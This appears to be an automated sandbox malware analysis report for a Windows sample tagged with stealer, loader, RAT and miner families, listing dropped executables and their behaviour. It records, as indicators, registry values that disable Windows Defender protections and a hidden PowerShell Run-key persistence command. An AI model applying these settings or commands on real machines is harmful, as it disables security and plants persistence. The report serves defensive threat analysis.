Malware Analysis Report

2025-06-16 01:29

Sample ID 231031-dtjjvagc4t
Target e0704e6a0706dd6f5a5cee23e9ed3724.bin
SHA256 36ad3a6286f68da08ff4f79ab94a02e958ce3f154f59a9abf311776ac46f3a79
Tags
amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

36ad3a6286f68da08ff4f79ab94a02e958ce3f154f59a9abf311776ac46f3a79

Threat Level: Known bad

The file e0704e6a0706dd6f5a5cee23e9ed3724.bin was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline sectoprat smokeloader xmrig zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor paypal collection discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx

Glupteba

Modifies Windows Defender Real-time Protection settings

Raccoon

Amadey

Detect ZGRat V1

DcRat

SmokeLoader

RedLine payload

RedLine

SectopRAT payload

Raccoon Stealer payload

Glupteba payload

ZGRat

xmrig

SectopRAT

XMRig Miner payload

Stops running service(s)

Modifies Windows Firewall

Downloads MZ/PE file

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

UPX packed file

Executes dropped EXE

Windows security modification

Looks up external IP address via web service

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Adds Run key to start application

Drops file in System32 directory

Detected potential entity reuse from brand paypal.

Suspicious use of SetThreadContext

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies data under HKEY_USERS

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

outlook_win_path

outlook_office_path

Creates scheduled task(s)

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 03:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 03:17

Reported

2023-10-31 03:20

Platform

win10v2004-20231025-en

Max time kernel

75s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\FDD0.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1JQ18rs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2jh8949.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4ZS494TF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5MA1Oc4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Ym2Un8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7pz3cY76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CF47.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D10E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D603.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FDD0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\113A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\163D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2003.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D1EA.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\1A93.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\yr0ii36.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\CE8B.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\3.exe'\"" C:\Users\Admin\AppData\Local\Temp\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\696a4cdac022af544d50350572f5349368c2574b3b9734f98134752820b7e8e6.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vU0Er05.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Be8tn54.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\WK7Ai24.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iX4rx71.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\KAudioConverter\is-8UR57.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-TCE6D.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-H257L.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\KAudioConverter.exe C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-HQQTR.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-TAQME.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-8D3NL.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-VOOS0.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-9U019.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-PEDIT.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-J7265.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\XML\Styles\is-GEK9J.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-8AO40.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-EIEE6.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-ME1IE.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\KAudioConverter\is-0RKCO.tmp C:\Users\Admin\AppData\Local\Temp\is-O4QVO.tmp\LzmwAqmV.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Tx49bk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
